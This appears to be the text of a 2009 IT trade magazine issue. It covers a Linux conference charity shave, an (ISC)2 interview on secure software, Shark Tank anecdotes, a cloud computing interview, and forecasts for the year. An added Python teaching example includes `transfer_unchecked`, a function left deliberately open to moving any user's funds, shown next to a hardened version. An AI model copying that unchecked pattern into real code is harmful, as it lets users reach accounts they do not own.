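The transparency Lees describes is mostly a client-side problem once a name carries both A and AAAA records: resolve the name, try the IPv6 addresses first, and fall back to IPv4 quietly if the IPv6 path is broken, so the user sees the same content either way. The Python below is an added example written for this page, not Google's code or anything shown at the conference. It goes a little beyond the text by interleaving the two address families (the approach later written up as RFC 6555, "Happy Eyeballs") rather than exhausting all IPv6 addresses before trying IPv4. The `resolve` helper needs a real resolver; the demo at the bottom and the candidate list it uses are constructed so the fallback path runs offline against a loopback listener.

```python
import socket
from typing import Callable, List, Sequence, Tuple

IPV4 = socket.AF_INET
IPV6 = socket.AF_INET6

# A resolved candidate: (address family, sockaddr) as socket.getaddrinfo returns it.
Candidate = Tuple[int, tuple]


def resolve(host: str, port: int) -> List[Candidate]:
    """Resolve host to every (family, sockaddr) pair the resolver returns.

    A name with a AAAA record yields AF_INET6 entries; a name with only an
    A record yields AF_INET entries. Needs a working resolver, so the demo
    below uses a constructed candidate list instead of calling this.
    """
    infos = socket.getaddrinfo(host, port, type=socket.SOCK_STREAM)
    return [(family, sockaddr) for family, _type, _proto, _canon, sockaddr in infos]


def prefer_ipv6(candidates: Sequence[Candidate]) -> List[Candidate]:
    """Order candidates IPv6 first, alternating families.

    Interleaving bounds the delay a user sees when IPv6 is advertised but
    unreachable: at most one failed IPv6 attempt before an IPv4 address.
    """
    v6 = [c for c in candidates if c[0] == IPV6]
    v4 = [c for c in candidates if c[0] == IPV4]
    ordered: List[Candidate] = []
    while v6 or v4:
        if v6:
            ordered.append(v6.pop(0))
        if v4:
            ordered.append(v4.pop(0))
    return ordered


def tcp_connect(family: int, sockaddr: tuple, timeout: float) -> socket.socket:
    """Open one TCP connection; raises OSError on any failure."""
    sock = socket.socket(family, socket.SOCK_STREAM)
    try:
        sock.settimeout(timeout)
        sock.connect(sockaddr)
    except OSError:
        sock.close()
        raise
    return sock


def connect_with_fallback(
    candidates: Sequence[Candidate],
    timeout: float = 2.0,
    connector: Callable[[int, tuple, float], object] = tcp_connect,
) -> Tuple[Candidate, object]:
    """Try candidates in IPv6-first order and return the first that connects.

    `connector` is injectable so the fallback logic can be exercised without
    a network. If every candidate fails, the last OSError is re-raised so the
    caller sees an ordinary connection error rather than a silent IPv6 issue.
    """
    last_error: Exception = OSError("no addresses to try")
    for cand in prefer_ipv6(candidates):
        try:
            return cand, connector(cand[0], cand[1], timeout)
        except OSError as exc:
            last_error = exc  # remember why this family failed, try the next
    raise last_error


if __name__ == "__main__":
    # Offline demo: a listener on IPv4 loopback only, so the IPv6 loopback
    # candidate fails (refused, or no IPv6 stack) and the client falls back.
    server = socket.socket(IPV4, socket.SOCK_STREAM)
    server.bind(("127.0.0.1", 0))
    server.listen(1)
    port = server.getsockname()[1]
    # Constructed candidate list standing in for a dual-stack DNS answer.
    dual_stack = [(IPV4, ("127.0.0.1", port)), (IPV6, ("::1", port, 0, 0))]
    chosen, sock = connect_with_fallback(dual_stack)
    print("connected via", "IPv6" if chosen[0] == IPV6 else "IPv4")
    sock.close()
    server.close()
```

The point of re-raising the last error is that a dual-stack client should fail the way a single-stack client would; swallowing IPv6 errors and returning nothing is exactly the kind of opaque behaviour that makes users distrust the transition.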

All for charity, the great Linux shave

At this year's conference the attendees participated in a charity auction to raise money for the Save the Tasmanian Devil foundation. An award-winning photo taken by Bdale Garbee's wife was auctioned at the Penguin Dinner. A bidder offered $5000 for the photo if Garbee, the Linux CTO at HP, shaved his 27-year-old beard off. It was then extrapolated by Garbee and other bidders that if the total money raised exceeded $25,000 then Linus Torvalds would shave Garbee's beard. As it turned out, the total money raised was pushing $40,000 by the last day of the conference. The great shave was on!

Clockwise from left: Paul "Rusty" Russell talks Tuz in Linux; the crowd for the keynote; Bdale Garbee and Linus Torvalds both clean shaven; Andrew Bartlett prepares to talk about Samba 4

The Grill

W Hord Tipton of (ISC)2
The (ISC)2 executive director talks about designing security software, compensating for human error and pulling together to beat the bad guys
Mary K Pratt

The International Information Systems Security Certification Consortium, or (ISC)2, is a nonprofit organisation that educates and certifies information security professionals. W Hord Tipton has been promoting (ISC)2's new certification, the Certified Secure Software Lifecycle Professional, or CSSLP.

What's your primary mission as the new executive director of (ISC)2?

I want to bring together the [various technology security organisations], so when we're delivering a message in this complex world, we're speaking as more of a single voice. Too often, the organisations think we're competitors, when in 80% to 90% of what we do, we're not competitors at all. We have a lot of similarities, even with the different credentials and acronyms. Microsoft has their gold standard. HP, Cisco all have their [certifications]. SANS has theirs. And I've been talking with the directors of these to come up with some better ways to work together so we're all on the same side to promote IT security.

Given all the information about computer security, we still see some pretty significant breaches. Why aren't we further ahead?

It's all about software. Why has it taken so long to recognise that something different has to be done to eliminate what in many cases are easy paths into these [systems]? My theory is if we move a little faster, obtain some synergy working together, then maybe we can have time to think ahead and put prevention methods in place. We have tools to do this, but we either don't think ahead or people can't afford them or they haven't been deployed; they just get overlooked.

That's our thinking with the new credential we're launching. Everyone at this point recognises that much of the issue is around human errors: lost passwords, phishing, etc. These are just the result of people not being aware, properly trained or educated in things to look out for. So we need to adjust the balance between software that maintains functionality but at the same time is more ingrained with security protection.

Are you saying that security in software needs to protect against human error and carelessness?

I am saying a balance is needed between user-friendliness, functionality, controls and edit checks built into the software. Software can do much more to help avoid human error and improper-access violations. These mistakes never show up in a security vulnerability scan.

Who are the leading threats to enterprise security, and what exactly are they after?

At this point, it's more than just bragging to your buddies about messing up someone's Web site. It's a complete criminal enterprise. They have resources and can hire very sharp people to do their evil work. It's hard to keep up with them. That's why a lot of the shift is to protect the financial interests. That's where it seems the threats and the attacks have shifted to.

How are they getting into computer systems?

Fifty percent of the attacks are Web-based at this point. And PDAs and mobile computing devices are real targets too. Those are about 13%.

How do the threats to enterprise security differ from those posed to the individual computer user?

They're actually connected. They go after individual computers. You're familiar with the botnet piece of it, where individual computers become a network of 100,000 or so where you have massive computing power. The botnets are used primarily for mass distribution of spam and malware, and sometimes DDOS [distributed denial-of-service] attacks. A credit card number could be picked up along the way, since the computer is captured and many of us have financial programs on our PCs. But most of the credit card and Social Security numbers come from large breaches from institutional sources. That is when bundling of card packages occurs and profiting begins. These are generally the work of organised professionals.

The concern has been that security is an afterthought. How do you get IT leaders to stop tacking on security at the end of the software development lifecycle and instead consider it from the start?

We need to talk to developers at the very beginning of the conception stage. Right now, you have modules of security that are in a library. So if you can reuse those objects in your application, you save a lot of time. And in many cases, they're very thoroughly vetted models, but they may not be the solution to all issues. So you need someone at the front end to remind developers what you're trying to protect and to ask intelligent questions as the software evolves.

Once the software gets turned over to the programmers, they're operating on different incentives and motivations. They have locked-down budgets, the rush to market begins, and if someone comes in and asks, "Have you designed in there the need for input validation?" for example, it's too late. It will cost extra money and will slow things down.

And [the software] has to be deployed correctly. There needs to be a change configuration management process in place that at least has someone aware of how the software evolved and [that] if you change something in one place in the application, that might introduce a vulnerability in another place.

This is what we need to make sure the CIOs [and] the CFOs understand. Once it's made clear to them what risk they entertain by doing certain shortcuts, it makes it easier for them to understand why they need to spend the extra time and resources to produce a quality, secure product.

What do you think the enterprise security landscape will look like in five years?

We should be thinking about what's going to be happening in encrypting. We'll probably have quantum computing in not too many years, and encryption codes that now would take 100 years to break can be broken in a few minutes if you have the capability of quantum computing. So there has to be some thinking on how we deal with things in light of new computing.

So in five years, security will still be a big issue in IT?

Absolutely. That's why I think there's such a growing need for security professionals. It's what I see as the No. 1 recruitable position.
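Two of Tipton's points above are concrete enough to show in code: edit checks that have to be designed in at the start, and improper-access violations that never appear in a vulnerability scan. The Python below is an added example written for this page; it is not (ISC)2 or CSSLP material and not code from the interview. The ledger, the account ids, the users and the per-request ceiling `MAX_TRANSFER` are all constructed for illustration. `transfer_unchecked` is the "before": it trusts whatever account id the caller supplies, which is an authorization bug rather than a malformed-input bug, so a scanner probing inputs has nothing to flag. `transfer` beside it applies the checks in the order a practitioner would want them: shape of the input, then ownership, then the business edit checks.

```python
import re
from dataclasses import dataclass, field
from typing import Dict

ACCOUNT_ID = re.compile(r"A-\d{4}")   # the only shape an account id may take
MAX_TRANSFER = 10_000                   # hypothetical business rule: per-request ceiling


class BadRequest(Exception):
    """Malformed input: rejected before any business logic runs."""


class Forbidden(Exception):
    """Well-formed input naming an object the caller may not touch."""


@dataclass
class Account:
    owner: str
    balance: int


@dataclass
class Ledger:
    accounts: Dict[str, Account] = field(default_factory=dict)

    # 'Before': trusts the caller-supplied ids. Any authenticated user can move
    # money out of any account. Every input is well-formed, so nothing here
    # looks like a vulnerability to a scanner; it is a missing ownership check.
    def transfer_unchecked(self, user: str, src: str, dst: str, amount) -> int:
        self.accounts[src].balance -= amount
        self.accounts[dst].balance += amount
        return self.accounts[src].balance

    # Hardened: validate shape, then enforce ownership, then apply edit checks.
    def transfer(self, user: str, src: str, dst: str, amount) -> int:
        for ident in (src, dst):
            if not isinstance(ident, str) or not ACCOUNT_ID.fullmatch(ident):
                raise BadRequest(f"malformed account id: {ident!r}")
        # bool is an int subclass; the strict type check keeps True from meaning 1
        if type(amount) is not int or amount <= 0 or amount > MAX_TRANSFER:
            raise BadRequest("amount must be an integer between 1 and MAX_TRANSFER")
        if src == dst:
            raise BadRequest("source and destination must differ")
        source = self.accounts.get(src)
        # One error for both 'no such account' and 'not your account', so the
        # caller cannot enumerate which ids exist by probing.
        if source is None or source.owner != user:
            raise Forbidden("account not accessible")
        dest = self.accounts.get(dst)
        if dest is None:
            raise BadRequest("unknown destination account")
        if source.balance < amount:
            raise BadRequest("insufficient funds")
        source.balance -= amount
        dest.balance += amount
        return source.balance


def sample_ledger() -> Ledger:
    """Constructed sample data for the demonstration."""
    return Ledger({
        "A-1001": Account(owner="alice", balance=500),
        "A-1002": Account(owner="bob", balance=300),
    })


if __name__ == "__main__":
    ledger = sample_ledger()
    # alice moves bob's money: the unchecked handler lets it through
    ledger.transfer_unchecked("alice", "A-1002", "A-1001", 100)
    print("unchecked: bob now has", ledger.accounts["A-1002"].balance)
    try:
        ledger.transfer("alice", "A-1002", "A-1001", 100)
    except Forbidden as exc:
        print("hardened:", exc)
```

The ordering matters for the point Tipton makes about scans: the malformed-input rejections are what a scanner can exercise, while the ownership check is only testable by someone who knows what the application is meant to protect, which is why it has to be specified before the code is written rather than bolted on afterwards.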

Dossier

Name: W Hord Tipton
Title: Executive director, (ISC)2
Location: Palm Harbor, Florida
Favourite place: Alaska. "It's wild, it's very thinly populated, and it has great fishing and great hunting and all the outdoor things I like to do. I've been all the way from Juneau to the Arctic Circle."
Dream job: Sea kayaking tour guide in the Discovery Islands, east of Vancouver Island, Canada.
Best workday ever: "When I was [CIO in the US Department of the Interior] and the White House determined that our IT architecture was the best in government and a best practice. That was in 2005. It was so significant to me because when I went into the job, it was the lowest-ranked in government."
Favourite technology: "It has to be computers. I've built 19 of them and a couple of servers; that's my hobby."
When he retires: "I retired [from the Interior Department in 2007]. I fished, I golfed, I hunted, I worked 20 hours a week consulting. I liked that. I'll probably do it again unless another exciting job like this pops up."
Favourite nonwork pastime: "That's easy: playing with my granddaughter. She's seven."

Opinion

Shark Tank

Got a problem? Turn to IT

University IT department rolls out a new Web portal to simplify access to the school's various information systems, reports a techie working on the project. "We marketed the heck out of the Web portal, purchasing balloons, mouse pads and custom M&Ms," he says. "To further foster adoption, we put up a suggestion box on the log-in page, asking for improvements users would like to see on the new portal. One of our female students responded with the following: 'I think hooks on the inside of the bathroom stall doors would be beneficial to students. At least for the women.'"

Why IT loves HR

This IT tech has worked his way through university at a supermarket chain, but with his new IT degree, he applies for a job at an insurance company. "One Friday afternoon at the supermarket, the personnel department at the insurance company called and asked me if I could start Monday," he says. "I explained that I had given my word to the supermarket that I would give two weeks' notice. They said if not Monday, the offer would be withdrawn. Fast-forward two weeks: Personnel calls again. Same scenario, Monday or else. I kind of liked the supermarket job anyway. Fast-forward another two weeks. Personnel called again. This time, they asked if I could give two weeks' notice and start two weeks from Monday. We agreed, and two weeks later I went to work. First words from my new boss: 'I don't know what took so long. We really could have used you a month ago.'"

Just one more thing

It's time for this IT tech's annual review. "I get called into the boss's office, and we go over the review," says tech. "Our review is based on a 1-to-5 scale, where 3 is adequate, 1 is above and beyond the call of duty, and 5 means you stink. I'm getting nothing but 1s and 2s, and I'm feeling pretty good. Boss asks, 'Any questions?' I say, 'Nope.' Boss says, 'I have to lay you off.' I do a trout imitation."

Automation, redefined

While chatting with the manager of a department that prepares daily operation reports, this IT worker comments, "With all your new software, I would imagine that all of your reports are automated now." Replies manager, "Oh, yes, we don't do anything manually anymore. We copy and paste everything now!"

Happy now?

This IT worker writes a program to check activity on a particular server, then starts it up and leaves it running. Results? "The software to monitor the server for errors had stopped working two months before," he says. "The software to monitor the server for intruders had stopped working four months before, and nobody had noticed. The server had several rogue sessions taking up resources and slowing it down. The e-mail system had a stuck message in it. The network had an intermittent fault. The only thing working properly was my program. A number of teams had to sort out the errors and explain why they were not picked up. Let's just say I am not the most popular person with them at the moment."

Oops!

This IT worker and his cohorts have worked out a system for identifying laid-off co-workers. And it's reliable . . . mostly. "We generally found out that a colleague had been fired when we tried to call the person and the office phone number no longer worked," he says. "Things got a bit tense one day when the phone system went on the fritz."

Send your true tales of IT life to sharky@computerworld.com

Top 10 qualities of a great IT shop
The 10 most important practices to look for if moving to a new company or evaluating an IT shop as a consultant
Paul M Ingevaldson

No two IT shops conduct business in the same way: CIOs report to various executives, project approval processes are all over the board, and personnel policies are vastly different. Unlike other professions, IT doesn't seem to have a common set of basic principles across companies.

But some best practices have bubbled to the top. If I were anticipating a move to a new company or evaluating an IT shop as a consultant, here are the most important practices I'd be looking for:

1. The CIO reports to the CEO or, at least, the chief operating officer. This is vital to the success of the IT department. It gives the CIO clout and ensures IT's independence.

2. There is an IT steering committee composed of C-level executives from the business units. The executives make their decisions based on some set of priorities and criteria such as ROI. The committee is necessary to ensure that allocation decisions are made in the interests of the entire company, not of an individual department.

3. The IT shop uses up-to-date software and hardware. It should also have reasonable policies for PC software upgrades and other regular system updates. In addition, the company should be spending an appropriate percentage of corporate revenue on IT. This indicates the company's level of commitment to IT.

4. There is a high-visibility system security team. Since security is one of the most vulnerable areas of IT, it must be well managed.

5. There is an ongoing disaster recovery process involving users, and a documented recovery plan that is tested regularly. Commitment to security and disaster recovery indicates the importance of IT to senior management.

6. There is an ongoing commitment to training to keep IT staffers up to date. This should include attendance at technology conventions as well as training seminars and industry events. If there is a lack of training and a parallel use of consultants, you know that the focus is not on in-house staff.

7. There is rigid adherence to some system development lifecycle (SDLC) that is understood by IT and the user community alike. (Knowing how IT works helps users interact with IT more effectively.) Any of several SDLC plans may be used, depending on the type of project, but the process of selecting the approach should be documented. This gives you some insight into the professionalism of the IT organisation.

8. There are established technical and managerial career paths that enable workers to remain technical and achieve higher pay and status within the organisation. This is the only way to retain top technical people who have no interest in managing others.

9. IT produces, at minimum, a monthly status report that shows progress on all major IT projects. This document should be widely distributed throughout the company. Its existence shows the level of interest of IT within the organisation.

10. IT sits at the long-range planning table and participates. If this is lacking, it is a sure sign that IT is looked at as an implementer and not an enabler.

These are the things I would look for in a top IT shop. I have seen many shops that follow some of these practices, but few that follow all of them.

Paul M Ingevaldson retired as CIO at Ace Hardware in 2004 after 40 years in the IT business

Panic and how to prevent it
How IT managers should confront today's reality and tomorrow's fears
Paul Glen

The year ahead isn't shaping up to be a good one for IT, to say the least. As we settle into a recession, budgets are increasingly going to reflect the worsening business conditions. That means a year or more of tough times for all of us. The sad reality is that more of us will be looking for work in the next 12 months.

And for those with jobs, it's not going to be so pleasant either. When times get tough, people feel stressed out, frazzled and nervous. That's not unreasonable. When people are faced with a combination of resource limits, personal insecurity and demands for productivity, emotions run high. There are no easy jobs left. Those of us lucky enough to be employed have stressful jobs now.

For managers, this represents a significant challenge. Stressed-out knowledge workers do not perform at their best. Just when we need people to focus and produce, they are distracted by the ugly reality outside. You really can't expect people who are worried about their personal financial security to completely shut out those thoughts in order to concentrate on their work. But knowledge work requires exactly that sort of composure.

To a degree, distraction is unavoidable. But as managers, we need to do our best to help people stay on track and do that which is completely unnatural: keep their eyes off their fears and on their work.

Doing this requires careful thinking about the emotional state of the staff. Now more than ever, we need to realise that we are not managers of stuff, but of people who do stuff. We don't manage tasks; we manage the people who do those tasks. And people have emotions that affect their performance.

The most important emotional state to pay attention to right now is panic. We have to help keep stressed-out staffers from becoming a panicked mob. Stress may be unavoidable, but panic is not. As a consultant, I've seen lots of organisations and project teams under pressure. Some have been composed and focused; some, stressed out; and others, panicked. What's interesting is that the facts surrounding their work are often similar. They are all under time and resource constraints, and many are facing the same personal insecurity. But they respond differently.

I've noticed that one of the key differences is in how the managers of these groups respond to those facts. Managers who deny reality generally don't fare too well. Telling people, "There's no problem here; what are you worried about?" usually convinces the staff that you are either an idiot or a liar. Neither is a useful image. Managers who try to tell their people what they should or shouldn't feel about reality generally don't fare well either. Telling people "You shouldn't worry about this" usually gets them worrying. Managers who panic themselves are the most likely to induce panic in their people.

The teams that do the best seem to be those whose managers openly acknowledge reality and meet it with determination rather than trepidation. And how you respond is more important than anything you say. When you establish a common frame for reality and convince everyone that you see the same challenges they do but are willing to take them on, you demonstrate the best response.

Having done that, you need to focus attention on the things you can control, on the activities that will give the best chance for success. If those around you see the possibility of a better future and feel that they have the power to be part of creating it, they are most likely going to respond well, no matter how challenging reality may be.

Paul Glen is the founder of the Geekleaders.com Web community

Security predictions for 2009
On botnets, encryption and mega-worms . . .
Andreas Antonopoulos

My predictions for information security in 2009 are just predictions, not recommendations. I am trying to guess what will happen, not suggesting what should. As always, take these with a grain of salt.

Though these predictions are based on primary research and many, many discussions with CSOs, they concern information security only and can be affected by external factors that are unpredictable (at least by me). Case in point: My predictions for 2008 did not take into account a severe downturn in the economy that was underway already at the beginning of the year. Let's hope that my 2009 predictions also miss the mark by assuming a continuation of economic difficulties that turn out to be less severe than predicted. Here goes:

Host-based security becomes the focus for 2009. The imminent release of Windows 7 and the continued interest in Mac OS and Linux as alternative desktops are once again focusing attention on operating-system and endpoint security.

Mobile security concerns and solutions grow. The Android and iPhone platforms continue to grow, and with them comes an ecosystem of independent application developers. With mobile platforms truly becoming platforms for all kinds of new applications, security issues are not far behind. 2009 could be the year of the first widespread security scare on a mobile platform. Perhaps a rogue application? A Trojan?

Encryption grows. At-rest encryption of hard drives on all desktop systems becomes the norm. Servers still lag behind. Encryption of mobile-device storage starts getting interesting. And once again in 2009, it's still impossible to send an encrypted e-mail to someone without making special arrangements in advance. Public-key infrastructure (PKI) encryption remains fragmented in small disconnected islands. Ugh.

No news is bad news. There are no new, high-profile, fast-spreading mega-worms. The world rejoices at the defeat of malware. Meanwhile super-stealthy malware spreads further than ever before, and those in the know quietly weep.

New botnets are discovered and they're bigger than ever. The malware industry feeds the ever-increasing botnet industry. As usual, most of the innovation happens on the other side of the industry. Botnet makers continue to build incredible distributed, encrypted, anonymous, unbreakable command-and-control systems. Who said there are no profits to be made in 2009? If only BTNT was a publicly traded stock!

Regulatory compliance is back with a vengeance. All the scandals and Ponzi schemes you heard about in 2008 become subtitles for new regulations in 2009 and beyond. Regulations in hedge funds, credit-default swaps and derivatives are just the beginning. A whole new industry of auditors, special software and consultants rises up to meet the challenge. You thought SOX was a pain? Just wait.

Security projects struggle for funding. It will take a lot of arguing to get a budget for more than upkeep in 2009. But wait, regulatory compliance comes to the rescue: Use compliance to push through budget requests on everything. It's 2007 all over again!

Andreas Antonopoulos is a senior vice president and founding partner at Nemertes Research, an independent technology research firm


    John Scumniotales

The Big Switch to cloud computing
Nicholas Carr touts reliability but fears vendor lock-in
Thomas Hoffman
Photo courtesy Jason Grow

Cloud computing may be the answer for organisations looking to boost their server and storage utilisation rates without increasing the workforce supporting those systems, says Nicholas Carr, author of The Big Switch: Rewiring the World, From Edison to Google (WW Norton, 2008). Carr told Thomas Hoffman that he thinks the cloud will enable companies to lower their capital equipment costs and reinvest IT money in other areas, such as new product development.

Why should Fortune 1000 CIOs trust the reliability of the cloud?

If you look overall at the records of Amazon.com and Salesforce.com, they're actually quite good. But they're not perfect, and I don't think they'll ever be perfect, any more than any company's internal systems are. But I think what we're going to see is that over time, the reliability of these cloud systems is going to steadily increase. And eventually, if not already, they're going to be more reliable than the average company's systems are.

We'll see different things move to the cloud in different stages, and one of the criteria will be, How reliable do you need this system to be? For instance, I was speaking a few weeks ago to some federal government CIOs, including some from the intelligence community, and it's pretty clear that there are some sorts of systems that need to be basically bulletproof. And I think it's going to be a long time before companies and governments are going to trust those types of applications to the cloud. But from what we've seen already, whether it's Amazon's infrastructure or various software-as-a-service offerings, even now, the reliability is good enough for a lot of corporate applications.

Another top concern among IT execs is how to avoid getting locked into a particular vendor's cloud service.

I think buyers should be worried about lock-in. If we're going to have the kind of interoperability and standardised data formats necessary to ensure fairly easy migration among


vendors, it's going to have to be the buyers pushing the vendors to move in that direction. Unless the buyers make that a demand for doing business with a vendor, I fear that we'll see a lot of vendors, even if they talk a good game about standardisation, actually pursue strategies to make it hard to get off their clouds, to quote Mick Jagger.

How concerned should CIOs be about the possibility of Microsoft, Google and other heavyweights coming to dominate the cloud?

When we look ahead and try to figure out the ultimate structure of the cloud or the computing utility industry, there are a lot of open questions. But when we look at the infrastructure side, it certainly appears to be a very capital-intensive operation. So we're seeing companies like Google and Microsoft spending billions of dollars a year, and that leads me to believe that because of the capital expense of building these networks, there's going to be a relatively small number of suppliers who can afford to build them.

So that in itself raises some red flags. But another question is, what about the services, the applications that ride on top of that infrastructure? Will that remain sort of a separate business with lots of providers competing? Or will the Googles of the world suck up those applications as well? Will we see a small number of vendors holding power over both the infrastructure and the applications? I don't really know. Regulations will play some part in it and also the ability of a company like Google to innovate in a way that's attractive for businesses, which it really hasn't done much of yet.

How do CIOs make the big switch without decimating their IT staffs and placing their own jobs at risk?

One of the advantages of the cloud is that it allows you to not only reduce your capital expenditures in IT but to reduce your IT staff. And if it didn't, it wouldn't be that attractive, because IT labour costs are such a big part of IT costs. So as CIOs look ahead, they should come to grips with the fact that this may mean that their empire may shrink.

On the positive side, as the head count shrinks, their visibility and importance to the business may increase as they move away from managing the machinery and the applications and the licences to focusing more on the business logic. But if you go into it thinking, I can only do something that allows me to maintain my current staff or to expand my staff, you're probably going to run into roadblocks with the cloud pretty quickly.

Some companies that have outsourced their IT operations still retain staff in-house to work with outsourcers and users. Would you expect to see the same type of model playing out in the cloud?

I think so. Cloud computing is a form of outsourcing, using outside suppliers. And I think it will tend to have that same effect on IT shops. There will be some kind of information systems broker who, similar to the people who manage outsourcing relationships, figures out how we distribute our systems and our requirements and applications among these cloud providers. You still need somebody to make the connection between the business and the application, though in a radical scenario, that job may move outside the IT department and into the businesses themselves.

How should CIOs change the way they approach IT in light of the troubled economy?

Clearly, and this is something that CIOs have gotten used to this decade, for better or for worse, cost is going to continue to be a big factor. I think the judicious use of the cloud can help in that [regard], because it does allow you to avoid capital investments, which can be very hard to make a case for now.

Running counter to that, companies tend to get very conservative in periods of economic tumult, and even experimenting with new models such as cloud computing may begin to be difficult. But compared to a few years ago, there are more options now for getting more IT capability at the same or a lower price. Companies shouldn't be afraid to explore those options and experiment with them.

Might recent investments in virtualisation keep large companies from making a wholesale switchover to cloud computing, at least in the short term?

I don't think big companies are going to make a wholesale switchover to the cloud, because I don't think the cloud is ready for all the things that companies do internally in IT. But I think virtualising your own IT infrastructure is going to make it easier in the long run to pull in more and more capabilities from the cloud, or begin to use the cloud as basically an extension of your own data centre so that every time you get an upsurge in demand for a particular application, you're not faced with the need to go out and buy a lot of new servers. You can use the cloud as kind of an add-on and expand to it.

You were interviewed by Stephen Colbert on The Colbert Report recently. What was that like?

I watch the show a lot, so I kind of knew what I was getting into. But my wife was like, "Don't do it! Don't do it!" The producer told me to make a few points, try to be serious and clear, and try to ignore [Stephen Colbert] because he's going to try to play off you and trip you up. And that was good advice. It was fun, actually.

You've said that Google has made us all stupid. But some research suggests that the Internet may stimulate some neural activity.

I think [it] can do both things. The study you're talking about showed that when we use the Internet, a lot of the areas of our brains are active, including decision-making parts that aren't very active when we read. But [I wonder about] the quality of thinking that's going on in your brain. [If] so many areas of your brain are activated when you're online, does that hinder the type of concentration and reflectiveness that occurs when you're sitting quietly reading?


Forecast 2009: The year ahead for IT
Experts weigh in with their predictions of what will be hot and not in IT for 2009

Michael Warrilow
Managing director
Hydrasight

1. Cloud computing will begin to occupy the thoughts and strategies of most IT organisations. While there are many possible definitions and interpretations for cloud computing (a problem that will lead to increased confusion in 2009), the underpinnings for cloud computing in the enterprise are straightforward. Namely, that the server-centric computing model is (slowly) returning to favour on a globally-connected scale. Moreover, we believe that addressing variability in demand for computing resources and solutions will make traditional internal/on-premise solutions increasingly cost and time prohibitive. While the implementation styles for cloud will often be very different, the underlying principles of resource sharing will pervade all major solutions. In that sense, cloud computing is not so much a revolution as a major contributor to the IT industry's evolution.

2. The downturn in the economic environment will force a major (re)focus on cost reduction. However, the extent of the fall in IT spending will not mirror the post-Y2K hangover of 2001, if only for the fact that IT budgets have been more tightly managed in recent years. What's more, most of the banks and (federal) government departments began to tighten their belts in 2008. Regardless of the starting point, every major RFT and contract review will be subject to extreme scrutiny on reducing expenditure. Savvy CIOs will use the current opportunity to capitalise on labour restructuring, to negotiate more favourable licence and support contracts as well as to reset operational performance expectations within the business. Moreover, they will use technology as a reason to restructure the business.

3. Green IT will become subsumed into broader organisational programs and roles for environmental and social responsibility compliance. In the process, Green IT will increasingly be viewed as a subset of doing greener business. During 2009, the environmental sustainability market will be thrown into a state of confusion resulting from legislation that, combined with vendor opportunism, will lead to a questioning of confidence.

4. Virtualisation: As server virtualisation adoption rates continue to increase, IT organisations will be forced to place greater focus on managing virtualised environments and integration with existing management tools and processes as well as a variety of "point" solutions. The perceived success will continue to drive investigation of desktop virtualisation during 2009. However, the vast array of options and approaches available will confuse the majority of organisations. Leading organisations will begin to recognise the opportunity to leverage their existing server virtualisation efforts to facilitate early cloud deployments.

5. Video conferencing and telepresence will slowly increase in adoption due to often-misguided beliefs about the cost savings and environmental benefits. Despite the absence of any greater measures of success or rewards over previous video conferencing initiatives, many organisations will nonetheless make substantial over-investments in fixed location video-based collaborative technologies. Moreover, 2009 will see an increase in the perceived failure of unified communications projects.

6. Mobile computing: Due in no small part to the iPhone, there will be a renewed business focus on dedicated remote devices, especially for delivery and capture of field data. The high cost of poor data quality will be highlighted by renewed interest in organisational efficiency projects. However, until local economic conditions improve, only those projects with a direct, tangible cost benefit analysis will proceed. Ultimately, 2009 will see an increasing awareness of the reality of moving away from managing the development and deployment of applications on specific devices to enabling secure information access irrespective of device, platform or location.

7. Microsoft Windows: Despite Windows Vista's perceived failure, Windows 7 will prove to be no more compelling or attractive for the majority of organisations during 2009. Enterprise upgrades to Vista will nonetheless proceed during 2009, but on a less aggressive scale than Microsoft would undoubtedly like. Management and administration costs for the Windows platform will generally continue to increase as organisations become more dependent on the technology. However, many of these costs will be obscured by complex cross charging and line-of-business/workgroup specific resources that become considered business roles rather than IT roles.

8. Business intelligence: Information analysis will consume substantial business and IT resources during 2009 as organisations attempt to better understand and remediate the impact of the financial downturn. Interest in, and use of, business intelligence, analytics and modelling tools will increase, though adoption will be broadened across the enterprise rather than being substantially transformative.


Ross Dawson
Chairman
Future Exploration Network

The last year of the decade will bring more change than any other year this decade, says Ross Dawson, chairman of Future Exploration Network, a global consulting firm that helps companies understand the future.

Perversely, a slowing economy will accelerate the pace of change, says Dawson. Many companies will take advantage of the downturn to use technology in innovative ways. Technology ranging from mobile applications to online gaming will become an everyday part of our work lives.

Social change tends to be faster in a downturn, notes Dawson. Our attitudes to what is acceptable behaviour by the government and companies will rapidly evolve. Technology is shaping society, but society is also shaping technology, particularly in how it allows us to express forcible opinions.

Dawson points to six important forces that will shape business and society in 2009:

1. Constant Partial Attention: 2009 will see more people consuming 20 hours or more of media a day. And no, it's not just the insomniacs. It is due to a phenomenon called Constant Partial Attention, or CPA, in which our attention is constantly divided between a massive array of channels, now including mobile Internet, video screens on buses, and more. Over two-thirds of people watch TV while reading. To be successful, we need to thrive on constant interruption.

2. Half of us expose ourselves; the other half watches: 2008 saw a surge in Australians using Twitter, the world's most popular micro-blogging platform. As a result, people are becoming more and more comfortable living their lives online. In 2009, expect to see more of your friends. Literally. With increased access to online video technology, and mobile data plans getting cheaper, sending video updates of our every move will seem normal.

3. Gen Y wakes up to Gen Z: In 2009, Generation Y (1979-1990) won't be the new kids on the block any more as Generation Z enters the workforce. The "me" generation will wake up to dramatically changed conditions in the workforce, including younger competition, after expecting instant rewards for years. Sophisticated and with a social conscience, Gen Z has never lived without the Internet or mobile phones. Their adaptability and early experience of economic woes will create new challenges and opportunities for employers.

4. Outsourcing for the masses: Outsourcing used to be for banks and telcos. This year will see a big increase in outsourcing for us mere mortals. Many will use assistants in India or Hungary to make travel bookings, set up a personal Web site, or design a flyer for the school fete. Australian company 99designs is letting companies small and large tap designers all over the world, and Australians are among the leading users of online outsourcing services.

5. Companies become social: In 2009, companies will truly embrace social networks, blogs, and other Web 2.0 tools, bringing new ways of connecting into the workplace. From zero users just two years ago, now over 3.5 million Australians are socialising using Facebook. Companies are realising that better connected staff are good for business. Westpac, Lend Lease and Deloitte are just some of the companies paving the way for a transformation of how we work.

6. Media industry shatters: Major Australian media companies could fall in 2009. They have seen the rivers of gold of print classifieds rapidly shift to the Internet. In the US, classified advertising has fallen by over 60% in the last two years, and newspapers including Christian Science Monitor have stopped printing, shifting to solely online. Journalists themselves will prosper, having the most relevant skills in an information age, but for many their future won't be in traditional journalistic roles.

Simon Elisha
Chief technologist
Hitachi Data Systems Australia & New Zealand

1. Doing a double take on data deduplication: While data deduplication moved quickly from discussion to implementation, in 2009 organisations will realise that there is still a home for tape in their backup environment. In some cases the cost of data deduplication does not always merit the solution, making a 50/50 mix of disk and tape the preferred option for 2009 and beyond.

